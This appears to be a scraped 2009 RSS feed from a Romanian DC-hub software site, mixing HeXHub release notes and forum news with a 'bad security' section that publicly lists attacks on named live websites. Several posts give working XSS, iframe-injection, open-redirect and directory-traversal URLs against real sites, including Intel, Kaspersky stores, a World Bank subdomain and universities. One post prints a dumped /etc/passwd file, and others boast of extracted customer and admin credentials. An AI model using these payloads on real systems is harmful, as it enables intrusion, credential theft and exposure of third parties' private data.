nemesis.te-home.net http://nemesis.te-home.net <![CDATA[http://www.cromnet.ro   Vulnerable to SQL Injection   ]]> http://nemesis.te-home.net/badsec.html? http://nemesis.te-home.net/badsec.html? Wed, 21 Jan 2009 17:08:50 GMT <![CDATA[New plugin for HeXHub: CmdSpy, a plugin that notifies the hub owner about the use / attempt to use o ...]]> http://nemesis.te-home.net/?news= http://nemesis.te-home.net/?news= Thu, 22 Jan 2009 17:52:28 GMT <![CDATA[Abdul DC Bot version 1004 released, including new filter plugin. ]]> http://nemesis.te-home.net/?news= http://nemesis.te-home.net/?news= Sat, 24 Jan 2009 22:26:46 GMT <![CDATA[http://www.goldhost.ro Romanian Hub Hosting  XSS Bug  ]]> http://nemesis.te-home.net/badsec.html? http://nemesis.te-home.net/badsec.html? Sun, 25 Jan 2009 19:25:20 GMT <![CDATA[Log with IP changes for Downadup domain list ]]> http://nemesis.te-home.net/index.html?news= http://nemesis.te-home.net/index.html?news= Thu, 29 Jan 2009 21:00:20 GMT <![CDATA[http://www.romaniairc.org   Vulnerable to SQL Injection   ]]> http://nemesis.te-home.net/badsec.html? http://nemesis.te-home.net/badsec.html? Sun, 1 Feb 2009 20:42:14 GMT <![CDATA[http://kinder.lx.ro   Vulnerable to SQL Injection   ]]> http://nemesis.te-home.net/badsec.html? http://nemesis.te-home.net/badsec.html? Thu, 5 Feb 2009 10:03:59 GMT <![CDATA[http://linuxdcpp.berlios.de LinuxDC   Vulnerable to Cross Site Scripting ]]> http://nemesis.te-home.net/index.html?news= http://nemesis.te-home.net/index.html?news= Thu, 5 Feb 2009 18:21:48 GMT <![CDATA[http://linuxdcpp.berlios.de LinuxDC   Vulnerable to Cross Site Scripting ]]> http://nemesis.te-home.net/badsec.html? http://nemesis.te-home.net/badsec.html? Thu, 5 Feb 2009 18:23:56 GMT <![CDATA[http://www.realtimeinfo.roo   Vulnerable to SQL Injection   ]]> http://nemesis.te-home.net/badsec.html? http://nemesis.te-home.net/badsec.html? Sun, 8 Feb 2009 20:11:25 GMT <![CDATA[SQL Injection Bug  On Bitdefender Thailanda  Website  ]]> http://nemesis.te-home.net/index.html?news= http://nemesis.te-home.net/index.html?news= Mon, 9 Feb 2009 22:46:24 GMT <![CDATA[VNC Spanish Server Pwned  ]]> http://nemesis.te-home.net/badsec.html? http://nemesis.te-home.net/badsec.html? Mon, 16 Feb 2009 14:19:31 GMT <![CDATA[F-Secure still Not Secure  ]]> http://nemesis.te-home.net/index.html?news= http://nemesis.te-home.net/index.html?news= Tue, 17 Feb 2009 21:30:26 GMT <![CDATA[= Kaspersky still Insecure? =]]> http://nemesis.te-home.net/index.html?news= http://nemesis.te-home.net/index.html?news= Sun, 22 Feb 2009 20:33:43 GMT <![CDATA[http://audioannex.com   Vulnerable to Remote File Inclusion ]]> http://nemesis.te-home.net/badsec.html? http://nemesis.te-home.net/badsec.html? Mon, 23 Feb 2009 11:30:02 GMT <![CDATA[http://www.moneytransfer.ie   Vulnerable to SQL Injection   ]]> http://nemesis.te-home.net/badsec.html? http://nemesis.te-home.net/badsec.html? Tue, 24 Feb 2009 17:11:28 GMT <![CDATA[Log with IP changes for Downadup domain list, february update ]]> http://nemesis.te-home.net/?news= http://nemesis.te-home.net/?news= Tue, 24 Feb 2009 17:50:11 GMT <![CDATA[Website Update]]> http://nemesis.te-home.net/News/20090225_Website_Update.html HeXHub 5.03. Many errors were corrected and many new features were added. Hopefully, in the near future HeXHub will become the first forum/blogging software written entirely in asm, without the need of any 3rd party libraries or software installs. Making a new forum will not require any scripting, but simple HTML and very few HeXHub macro calls.
        If you make new templates that use HeXHub's new features, and you want them to be shared on this website and on HeXHub's sourceforge project page, let us know.
        Currently, version 5.03 of HeXHub is a beta, so until a stable version will be posted on this website use version 5.02c. Don't forget to subscribe to our RSS feed.]]>
http://nemesis.te-home.net/News/20090225_Website_Update.html?cpage=1 Wed, 25 Feb 2009 17:56:56 GMT
<![CDATA[Intel Security Center Has NO Security]]> http://nemesis.te-home.net/index.html?cpage=1
Nothing new ,all websites have same bug and it's enough to search for them



XSS


Code:
http://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00012&languageid=en-fr}"><script>alert(/XSS/)</script>


http://img8.imageshack.us/img8/3628/12494441.jpg


Iframe Injection


http://img3.imageshack.us/img3/7105/72800045.jpg


I can say LoL


Redirect


Code:
http://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00012&languageid=en-fr}"<META HTTP-EQUIV="refresh" content="0; URL=http://nemesis.te-home.net">



]]>
http://nemesis.te-home.net/index.html?cpage=1 Wed, 25 Feb 2009 19:17:12 GMT
<![CDATA[New Forum]]> http://nemesis.te-home.net/ HeXHub's new features. We have a new forum. You can use the account you have on our public hub on this website and on our forum. Web registration for new users on this website remains easy, with no CAPTCHA or e-mail validation required, but this may change as we see spammers trying to abuse it. For posted links a "rel=nofollow" is added if your account doesn't have spam1 right. However, the hub increases access level with each new post and after 100 posts your account is upgraded to a profile that has spam1 right.
Making a new forum is easy but there is no wizard or configuration tool yet (online or offline). All forum related functions are handled by the hub itself so no scripting is needed, only HTML. The new default template for version 5.03 (which will be updated in the next days) is a small forum that uses the newly added functions.
Forum support is only at the beginning, and many forum features need to be added. And they will be added if needed (that deppends on how many people will actually use HeXHub to host blogs or forums or how many people will use our new forum).]]>
http://nemesis.te-home.net/ Sat, 28 Feb 2009 08:58:49 GMT 1485577311
<![CDATA[Germanamericanbancorp.com - Vulnerable to xss ]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/
Code:
http://www.germanamericanbancorp.com/index.php?page=business_banking&bid="><script>alert("test")</script>



http://img3.imageshack.us/img3/4299/33416472.jpg

http://img3.imageshack.us/img3/3389/29962217.jpg ]]>
http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Sun, 1 Mar 2009 17:35:50 GMT 3860059994
<![CDATA[Crue.isi.edu - LFI]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31002_RFI_LFI/
Code:
http://crue.isi.edu/cgi-bin/page.cgi?page=/../../../../../../../../../../../../etc/hosts

Code:
http://crue.isi.edu/cgi-bin/page.cgi?page=../../../../../../etc/passwd



Quote:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh dhcp:x:100:101::/nonexistent:/bin/false syslog:x:101:102::/home/syslog:/bin/false klog:x:102:103::/home/klog:/bin/false mysql:x:103:106:MySQL Server,,,:/var/lib/mysql:/bin/false bind:x:104:109::/var/cache/bind:/bin/false phototest:x:1000:1000:Yu-Han Chang,,,:/home/phototest:/bin/bash sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin jeffsu:x:1001:1001::/home/jeffsu:/bin/bash btr:x:1002:1002::/home/btr:/bin/sh ychang:x:1003:1003::/home/ychang:/bin/sh isi:x:1004:1004::/home/isi:/bin/sh crue:x:1005:1005::/home/crue:/bin/sh Debian-exim:x:106:112::/var/spool/exim4:/bin/false smmta:x:107:115:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false smmsp:x:108:116:Mail Submission Program,,,:/var/lib/sendmail:/bin/false scottswood:x:1006:1006::/home/scottswood:/bin/tcsh lara:x:1007:1007::/home/lara:/bin/tcsh travis:x:1009:1010::/home/travis:/bin/tcsh gregg:x:1010:1011::/home/gregg:/bin/tcsh superask:x:1011:1012::/home/superask:/bin/tcsh haaaa:x:1012:1013::/home/haaaa:/bin/tcsh
]]>
http://nemesis.te-home.net/Forum/3100_Bad_Settings/31002_RFI_LFI/ Tue, 3 Mar 2009 08:37:20 GMT 3968452054
<![CDATA[Sci.nctu.edu.tw - Local File Inclusion]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31002_RFI_LFI/
Code:
http://sci.nctu.edu.tw/index.php?now=maga&page=/../../../../../../../../../../../../etc/hosts

Code:
http://sci.nctu.edu.tw/index.php?now=maga&page=/../../../../../../../../../../../../etc/passwd


Quote:
# $FreeBSD: src/etc/hosts,v 1.16 2003/01/28 21:29:23 dbaker Exp $ # # Host Database # # This file should contain the addresses and aliases for local hosts that # share this file. Replace 'my.domain' below with the domainname of your # machine. # # In the presence of the domain name service or NIS, this file may # not be consulted at all; see /etc/nsswitch.conf for the resolution order. # # ::1 localhost localhost.my.domain 127.0.0.1 localhost localhost.my.domain # # Imaginary network. #10.0.0.2 myname.my.domain myname #10.0.0.3 myfriend.my.domain myfriend # # According to RFC 1918, you can use the following IP networks for # private nets which will never be connected to the Internet: # # 10.0.0.0 - 10.255.255.255 # 172.16.0.0 - 172.31.255.255 # 192.168.0.0 - 192.168.255.255 # # In case you want to be able to connect to the Internet, you need # real official assigned numbers. Do not try to invent your own network # numbers but instead get one from your network provider (if any) or # from your regional registry (ARIN, APNIC, LACNIC, RIPE NCC, or AfriNIC.) #/quote]
]]>
http://nemesis.te-home.net/Forum/3100_Bad_Settings/31002_RFI_LFI/ Tue, 3 Mar 2009 08:49:28 GMT 504805019
<![CDATA[Other Bad Security Settings on Kaspersky's Websites]]> http://nemesis.te-home.net/index.html

kasperskylabs.ir web.kaspersky.com.tw and http://www.kasperskymall.co.kr Still Insecure

SQL iNJECTION

http://img12.imageshack.us/img12/2373/32665383.jpg

http://img12.imageshack.us/img12/7607/36349654.jpg  
-------------------------------------------------------------

XSS and Iframe url Injection


Code:
http://www.kasperskylabs.ir/fa/f_q/f&q.asp?search="><iframe src=http://nemesis.te-home.net></iframe>


Code:
http://www.kasperskylabs.ir/fa/f_q/f&q.asp?search="><script>alert('XSS')</script>
  



http://img3.imageshack.us/img3/4164/57777477.jpg


http://img3.imageshack.us/img3/6845/94350994.gif


http://img18.imageshack.us/img18/3058/59984584.jpg


-------------------------------------------------------------

http://img17.imageshack.us/img17/7969/11451606.jpg]]>
http://nemesis.te-home.net/index.html Tue, 3 Mar 2009 13:50:49 GMT 2248524789
<![CDATA[Forum signatures]]> http://nemesis.te-home.net/Forum/0100_News/ The signature can have BBCode and all BBCode restrictions for a topic also apply to it. Here, for example, all image hosts are allowed in Unmoderated Area, but on most other forums there is a restriction for image hosts to allow only imageshack, photobucket and postimage.org.
Also, some problems with HeXHub login pages (/login?*) were corrected so they no longer redirect to themselves if sending Referer is not disabled in client.
For those who like hub ASCII art, there is a new forum where they can be posted and they should look like in a NMDC client with default settings. If some of your settings are different, use [font] / [size] / [b] / [i] / [u] tags to make your image look like in your client. Be sure you get the correct font name (there is a difference between "Microsoft Sans Serif" and "MS Sans Serif" for example).
]]>
http://nemesis.te-home.net/Forum/0100_News/ Thu, 5 Mar 2009 20:08:45 GMT 312602601
<![CDATA[HeXHub 5.03]]> http://nemesis.te-home.net/ HeXHub - version 5.03.

Changes:
  • corrected: if maximum number of characters is specified in %[message] it no longer includes HTML tags
  • corrected: the character "[" could not be posted in comments unless using a [code] tag
  • corrected: the "+" character could not be used in variabiles and comments because its escaping (%2B) was replaced with a space
  • corrected: error while showing %[isp] in MOTD if no ISP was declared (thanks to RoLex for reporting this error)
  • corrected: some bans had an ending pipe in reason (thanks to RoLex for reporting this error)
  • corrected: login cookies were not set if a port was used in address
  • corrected: if a browser sent same address as referer, the hub was using it as return page from its default pages (thanks to RoLex for reporting this error)
  • corrected: error while removing items from BBCode stack (thanks to RoLex for reporting this error)
  • corrected: error while testing for forbidden image hosts in [img] tag (thanks to RoLex for reporting this error)
  • corrected: [size], [color] and [font] were expecting spaces and not "=" (thanks to RoLex for reporting this error)
  • corrected: unfinished [url] tag truncated the message (thanks to RoLex for reporting this error)
  • corrected: [code] and [quote] were affected by styles set for table borders
  • corrected: to enable the "upload limit" edit the dialogbox needed to be re-opened after checking the upload limit checkbox (thanks to RoLex for reporting this error)
  • corrected: error while parsing POST form data (thanks to RoLex for reporting this error and for helping with tests)
  • added: new options to notify about posting comments in mainchat and in opchat
  • added: new option to increase access level of registered users who post comments after every new post (the user can be upgraded to another profile that has adm0 right and the access level of the new profile completes an access level range with current profile)
  • added: %[date format] and %[time format] for user commands, raw messages and web macros (requested by RoLex)
  • added: new option to disable "DC to web" conversion for extended ASCII characters (thanks to Stomatolog and RoLex for showing this problem)
  • users can change their "reason / comment" field for their account to set a signature that may be shown in their comments (%[signature])
  • web reports can be saved to log
  • %[var] has additional verifications to prevent abuse (thanks to Methodman for tests)
  • firewall bans are now temp bans using default time set for kicks (requested by RoLex)
  • new macros: %[include], %[update], %[kauthor], %[kauthorip], %[kmsgdate], %[kmsgtime], %[kmessage], %[title], %[link] and %[posts]
  • new keyword in %[cdata]: update:key:filename, if this is present the hub will search and update all %[update]%[/update] and <key></key> labels in one or more specified files, where a key will match a posted comment or topic.
  • posted images that are not in an anchor are linked to their host
  • the forbid was updated with new strings (thanks to RoLex)
  • the reason field from account information is also used to store user's signature for comments (thanks to RoLex for testing this new feature)

]]>
http://nemesis.te-home.net/ Sun, 8 Mar 2009 21:46:54 GMT 1942317031
<![CDATA[Void passwords]]> http://nemesis.te-home.net/Forum/0100_News/ Your Account" page caused password reset for browsers that had the auto-complete feature enabled (the old password was entered by browser, but nothing was entered for new password / re-enter password). This caused some accounts to have void password and to be inaccessible. All those accounts were deleted and a new restriction prevents setting void passwords.
If you saw the message "invalid password" when trying to log in, you will have to re-register. Sorry for this inconvenience.
]]>
http://nemesis.te-home.net/Forum/0100_News/ Sun, 8 Mar 2009 22:11:51 GMT 2563448660
<![CDATA[Kaspersky Returns]]> http://nemesis.te-home.net/index.html
This is not the first time,however we hope that they look at my email and fix these bugs soon

http://www.kasperskystore.it

http://img7.imageshack.us/img7/6422/78775483.jpg

http://img7.imageshack.us/img7/9297/25822437.jpg


Also the redirect works fine  

Code:
"<META HTTP-EQUIV="refresh" content="0; URL=http://nemesis.te-home.net">

]]>
http://nemesis.te-home.net/index.html Wed, 11 Mar 2009 17:30:18 GMT 3089557660
<![CDATA[Spammers spread VKontakte.ru password stealing trojans on DC hubs]]> http://nemesis.te-home.net/Forum/3000_News/
Hub-Security wrote:
[04:46] <Hub-Security> From IP: 80.73.6.129, nick: downloadplease - Forbidden word(s) "http" found in mainchat message - "http://depositfiles.com/ru/files/4j40ii4nh - cool programm for download free files of all sites. Download 1.9 mb"


The file proga_dlya_vkontakte_VKLife.exe is a trojan from Pro-EXESoftware Company which is a trojan seller so this one will probably also not be detected by any antivirus (antiviruses don't detect commercial trojans). This trojan is similar to another well known russian application called VKlife and it sends login cookies for vkontakte.ru to http://www.pro-exe.com/vkontakte/unsavedvideo_log.php?sv=%[cookies] . It also contacts a list of users using the following links: http://vkontakte.ru/id11637808 , http://vkontakte.ru/id4955122 , http://vkontakte.ru/id2689314 , http://vkontakte.ru/id434723 .
The website pro-exe.com is well known for hosting fake login pages for vkontakte.ru. More information can be found here: http://uvidim.com/?p=71.
]]>
http://nemesis.te-home.net/Forum/3000_News/ Fri, 13 Mar 2009 08:08:29 GMT 3067831888
<![CDATA[HeXHub 5.03a]]> http://nemesis.te-home.net/         Changes:
  • corrected: error while showing banlist using /bans (thanks to Methodman for reporting this error)
  • corrected: the hub did not escape the '&' character correctly when using %[motd] (thanks to RoLex for reporting this error)
  • corrected: extended ASCII characters had wrong escaping when they were used in topic names (thanks to Neo and RoLex for reporting this error)
  • corrected: error while using %[userprofile] (thanks to RoLex for reporting this error)
  • added: support for "Ref=" sent in $Lock in a client2client negotiation

        Latest versions of most popular clients (DC++, StrongDC++, ApexDC++) implement a new protocol extension, they send the referrer hub in a client2client negotiation (the hub where the $ConnectToMe was sent that caused the client2client connection). This allows a better accuracy for detecting the hubs used in a DDoS attack. The main difference between a good hublist identification and referred hubs is, the hublists have only one address for same hub.

Hub-Security wrote:
[02:21] <Robot666> DDoS detected, gathering attack information...
[02:22] <Robot666> Attacker found in hub: dchub://dchub.hacker.lv:4012
[02:22] <Robot666> Port: 47534, flood rate: 42.09 connections/sec. (2525.62 connections/min.), number of different IPs filtered: 1565, most frequent country: LV=Latvia
        The attacker is exploiting the following hubs:
                hub.hacker.lv:4012
                dchub.hacker.lv:4012
                193.41.195.21:4012
[02:23] <Robot666> Port: 47534, flood rate: 57.85 connections/sec. (3471.56 connections/min.), number of different IPs filtered: 2314, most frequent country: LV=Latvia
[02:24] <Robot666> Port: 47534, flood rate: 90.90 connections/sec. (5454.37 connections/min.), number of different IPs filtered: 3001, most frequent country: LV=Latvia
        The attacker is exploiting the following hubs:
                dcHub.hacker.lv:4012


        The result from hublist searches is shown as "Attacker found in hub", referrers sent by clients are shown as "The attacker is exploiting the following hubs". All addresses point to the same hub.
]]>
http://nemesis.te-home.net/ Sun, 15 Mar 2009 00:37:29 GMT 1657439257
<![CDATA[Hublists Used by DDoS Bots]]> http://nemesis.te-home.net/Forum/3000_News/
Quote:

fairplay.myip.hu:8750
footballfactory.myip.hu:1899
koris-hub.no-ip.info:1980
hungarydc.myip.hu:3456
izekee.myip.hu:3000
shunshine.myip.hu:2008
angel-hub.no-ip.org:1987
musikhub.myip.hu:1456
cobweb.thecobwebnet.net:765
hypergames.sytes.net:7777
princess.ciupi.ro
mp3-music.sytes.net:6969
galeone.spqr-net.net:4110
dc.bol.bg
hub.ilva.lv
monopolowy.org:6969
pronovacky.com
hubanafra.net
hub.p-p-h.pl:8500
mp3world.sytes.net:6969
viziati.bounceme.net:1411
BilliardsClub.no-ip.info
dc3.speednet-se.net:2006
rettenet.sytes.net:1666
besthub.ro
forza-rapid.no-ip.biz:4012
hub1.cyberspace.ro
DcHub.Kaktuss.Lv
dc.bol.bg:411
devilshideout.adrenaline-network.com:6666
dc.data.bg
hubanafra.net:411
second.hubanafra.net
dchub.hacker.lv:4012
x.ciupi.ro
crazyhub.clax.ro
forza-rapid.no-ip.biz:4012
dc.pikenet.ru:4111
hub.p-p-h.pl:8500
viziati.bounceme.net:1411
besthub.ro
fairplay.myip.hu:8750
koris-hub.no-ip.info:1980
fairplay.myip.hu:8750
footballfactory.myip.hu:1899
koris-hub.no-ip.info:1980
hungarydc.myip.hu:3456
izekee.myip.hu:3000
shunshine.myip.hu:2008
angel-hub.no-ip.org:1987
musikhub.myip.hu:1456
cobweb.thecobwebnet.net:765
hypergames.sytes.net:7777
princess.ciupi.ro
mp3-music.sytes.net:6969
galeone.spqr-net.net:4110
dc.bol.bg
hub.ilva.lv
monopolowy.org:6969
pronovacky.com
hubanafra.net
hub.p-p-h.pl:8500
mp3world.sytes.net:6969
viziati.bounceme.net:1411
BilliardsClub.no-ip.info
dc3.speednet-se.net:2006
rettenet.sytes.net:1666
besthub.ro
forza-rapid.no-ip.biz:4012
hub1.cyberspace.ro
DcHub.Kaktuss.Lv
dc.bol.bg:411
devilshideout.adrenaline-network.com:6666
dc.data.bg
hubanafra.net:411
second.hubanafra.net
dchub.hacker.lv:4012

]]>
http://nemesis.te-home.net/Forum/3000_News/ Sun, 15 Mar 2009 12:11:06 GMT 1450773104
<![CDATA[Microsoft Lottery™ Strikes Again]]> http://nemesis.te-home.net/Forum/3000_News/ Downadub" that was used by hackers to delete databases from romanian prisons. While the virus is not new, the mispelling for its name is.

http://www.ziarulring.ro/stiri/politica/atac_informatic_la_interne_si_justitie.html wrote:
"Baza de date informatizată de la Rahova a fost distrusă. Din fericire, datele nu s-au pierdut, le avem și în format clasic, pe hârtie. Acum trebuie să reintroducem aceste date în calculatoare”, a precizat Băla.


Translation: "The database from Rahova has been destroyed. Fortunately, there was no data loss, we have everything on papers. Now we have to re-enter all the data to our computers." says Ioan Băla (the director of one of these prisons).

http://www.google.com/search?q=%22boala+digitala%22+microsoft wrote:
"Boala digitală”, așa cum a fost poreclit virusul Downadub, a atins sistemul informativ al ANP încă de acum două săptămâni. Pe lângă faptul că a îngreunat teribil și, în unele cazuri, a blocat complet rețelele de calculatoare din mai multe închisori, virusul a distrus chiar și mai multe baze de date cu deținuți.


Translation: "The digital disease", as Downadub virus was nicknamed, reached the ANP systems from two weeks ago. Besides the difficulties caused, and the fact that in some cases it completely blocked the computer networks of several prisons, the virus destroyed even several databases with detainees.

First of all, it's "Downadup", not "Downadub". And it is a worm, not a virus. More details about the analysis of its code can be found here: http://mtc.sri.com/Conficker. There are no functions in it that can alter databases. There are no functions in it that delete files. The only payload it has is to download and execute a file. The file must be digitally signed so to make it execute the file, you need to know the private key. It randomly generates 250 domain names daily and you can download a .zip file with all these domains until June 30th from the Microsoft Security Response Center. Until security companies registered all of them, we have logged all IP changes for estimated domains (1, 2). To make the virus download an executable file someone has to register one of these domains. But all estimated domains are already registered by security companies.

It's time to make a new lottery.

http://www.ziua.ro/news.php?data=2009-03-13&id=23255 wrote:
In trecut, Antena 3 a informat ca Microsoft a anuntat ca ofera o recompensa de 250.000 de dolari persoanei care poate furniza informatii ce vor duce la arestarea si condamnarea creatorilor viermelui informatic Conficker.

Tot in trecut, Antena3 a anuntat ca dupa ce a anuntat ca ofera o recompensa de 250.000 de dolari persoanei care poate ajuta la condamnarea creatorilor viermelui informatic Conficker, Microsoft ofera acceasi suma de bani oricui poate furniza informatii despre cei care celor au spart reteaua de calculatoare a Administratiei Nationale a Penitenciarelor (ANP).


Translation: In the past, Antena 3 has informed that Microsoft has announced that it offers a reward of 250,000 dollars to a person who can provide information that will lead to the arrest and conviction of Conficker worm creators. Also in the past, Antena3 announced that after it announced that it offers a reward of 250,000 dollars to a person who can help sentencing the creators of Conficker worm, Microsoft offers an equal amount of money to anyone who can provide information about those who have broken the network of computers of National Administration of Penitentiaries (ANP).

There are many known security problems caused by hackers to companies, government servers, military servers, etc. Databases get stolen and deleted all the times. But Microsoft doesn't offer any reward for any other unsolved cases unless they involve the romanian penitentiaries. Can you believe that ?
]]>
http://nemesis.te-home.net/Forum/3000_News/ Sun, 15 Mar 2009 14:02:46 GMT 740143879
<![CDATA[The451Group - Full Disclosure ]]> http://nemesis.te-home.net/index.html http://www.the451group.com

Quote:
The 451 Group is an independent technology-industry analyst company that was founded in 2000, and has offices in the US and Europe.  
Our research makes sense of swiftly moving trends in the industry creating information technologies (IT) used by large and midsized organizations.


Critical Sql injection was found on their website,and here I show you some info and screen.
The webmaster has been alerted about this and we hope that they fix these bugs soon.

All Table Names From Database

Quote:
Database 451ecommerce

    Table access  ( Rows)]
    Table authmap  ( Rows)]
    Table blocks  ( Rows)]
    Table blocks_roles  ( Rows)]
    Table boxes  ( Rows)]
    Table cache  ( Rows)]
    Table cache_content  ( Rows)]
    Table cache_filter  ( Rows)]
    Table cache_menu  ( Rows)]
    Table cache_page  ( Rows)]
    Table cache_workflow_ng  ( Rows)]
    Table cclink_schedules  ( Rows)]
    Table comments  ( Rows)]
    Table content_field_image_cache  ( Rows)]
    Table content_type_page  ( Rows)]
    Table content_type_product  ( Rows)]
    Table content_type_story  ( Rows)]
    Table devel_queries  ( Rows)]
    Table devel_times  ( Rows)]
    Table file_revisions  ( Rows)]
    Table files  ( Rows)]
    Table filter_formats  ( Rows)]
    Table filters  ( Rows)]
    Table flood  ( Rows)]
    Table history  ( Rows)]
    Table imagecache_action  ( Rows)]
    Table imagecache_preset  ( Rows)]
    Table menu  ( Rows)]
    Table node  ( Rows)]
    Table node_access  ( Rows)]
    Table node_comment_statistics  ( Rows)]
    Table node_counter  ( Rows)]
    Table node_field  ( Rows)]
    Table node_field_instance  ( Rows)]



Database Information


http://img16.imageshack.us/img16/6071/65454311.jpg


MySQL User Password


http://img16.imageshack.us/img16/5200/31508017.jpg
]]>
http://nemesis.te-home.net/index.html Mon, 16 Mar 2009 12:19:48 GMT 1439857535
<![CDATA[Securityspace Redirect]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/
Code:
http://www.securityspace.com/../secnews/redir.html?URL=http://nemesis.te-home.net  

]]>
http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Tue, 17 Mar 2009 12:39:14 GMT 1392965787
<![CDATA[Networkworld Redirect]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/
Code:
http://www.networkworld.com/search/searchresults.html?qt=pc&hpg1=sb&search="">>>><meta http-equiv="Refresh" content="0;url=http://nemesis.te-home.net/"> ""

]]>
http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Tue, 17 Mar 2009 12:45:22 GMT 1713804110
<![CDATA[IRC to NMDC]]> http://nemesis.te-home.net/ IRCtoNMDC is a program that converts one or more IRC channels from different IRC networks to local "virtual hubs" that can be joined by NMDC clients and bots. Each IRC channel is seen as a separate hub so a different port must be set for every added channel.
        All supported IRC features are added as user commands to user menus and hub menus. Also, NickChange is supported (if the client does not support NickChange, it is emulated).
        In version 1.00 many IRC specific features are not supported and there is no flood / spam detection. File sharing between IRC clients and NMDC clients is not yet implemented.
        Project homepage: IRC to NMDC
]]>
http://nemesis.te-home.net/ Sat, 21 Mar 2009 19:41:49 GMT 1391029895
<![CDATA[QSDChublist.com Updated]]> http://nemesis.te-home.net/index.html

  • Updated: New Design
  • Updated: A few MySQL queries to make the website use less resources.
  • Added: GZIP Support
  • Added: Hubsoft in Usersearch
  • Added Hubsoft in Hubsearch
  • Added Multilanguage system in Hubs/Usersearch/Hubdetails/FAQ/Home. Note: This feature requires cookies to be activated.
  • Added: Information on FAQ
  • Added: Address in Usersearch results
  • Removed: Userlist from hubdetails.


New languages:


  • Swedish - by Molotov
  • Danish - by Anonymous
  • Romanian - by The_Architect
  • Spanish - by The_Architect


Project homepage: www.QSDCHublist.com
]]>
http://nemesis.te-home.net/index.html Sun, 22 Mar 2009 00:59:56 GMT 1742301850
<![CDATA[QSDChublist.com Bugfixes]]> http://nemesis.te-home.net/
  • Corrected: XSS cross site scripting fixed in Language system (Reported by Methodman)
  • Corrected: Vulnerability to file inclusion (Reported by Methodman)


    Project homepage: www.Qsdchublist.com
    ]]> http://nemesis.te-home.net/ Sun, 22 Mar 2009 20:42:26 GMT 3231904666 <![CDATA[Telecomsite.nl - SQL iNJECTION ]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31003_SQL_Injection/ http://telecomsite.nl




    Database information


    http://img10.imageshack.us/img10/9964/96397856.jpg


    Client name ,email and password


    http://img10.imageshack.us/img10/825/69382350.jpg


    Admin name and password  


    http://img10.imageshack.us/img10/8152/53614544.jpg
    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31003_SQL_Injection/ Tue, 24 Mar 2009 20:13:35 GMT 950835108
    <![CDATA[XSS on Worldbank.org]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ http://masetto.worldbank.catchword.org xss vulnerability and redirect  

    Code:
    http://titania.worldbank.catchword.org/vl=2662207/cl=20/nw=1/rpsv/cgi-bin/activate.pl?cfg="><script>alert('XSS')</script>


    Code:
    http://masetto.worldbank.catchword.org/vl=2039499/cl=23/nw=1/rpsv/cgi-bin/activate.pl?cfg=<META HTTP-EQUIV="refresh" content="0; URL=http://nemesis.te-home.net">


    Code:
    http://titania.worldbank.catchword.org/vl=2662207/cl=20/nw=1/rpsv/cgi-bin/activate.pl?cfg='><iframe%20src=http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/?newtopic=1></iframe>



    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Tue, 24 Mar 2009 20:22:59 GMT 3019689386
    <![CDATA[Anewcreditcard.co.uk XSS bug]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ http://www.anewcreditcard.co.uk

    Code:
    http://www.anewcreditcard.co.uk/credit-card-details.php?id=13&card-name="><script>alert('XSS')</script>/code]

    Vulnerable also to SQL Injection

    [code]http://www.anewcreditcard.co.uk/credit-card-details.php?id=13'



    Quote:
    Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /home/sites/anewcreditcard.co.uk/public_html/includes/query2.php on line 14
    Couldn't execute query

    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Tue, 24 Mar 2009 20:29:44 GMT 741134526
    <![CDATA[Wingate - Sql Injection]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31003_SQL_Injection/ http://www.wingate.com

    http://img7.imageshack.us/img7/6883/15606540.jpg
    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31003_SQL_Injection/ Tue, 24 Mar 2009 20:59:11 GMT 3069159111
    <![CDATA[Unibg.it - LFI]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31002_RFI_LFI/
    Code:
    http://www02.unibg.it/~medusa/index.php?pag=../../../../etc/passwd%00



    Quote:
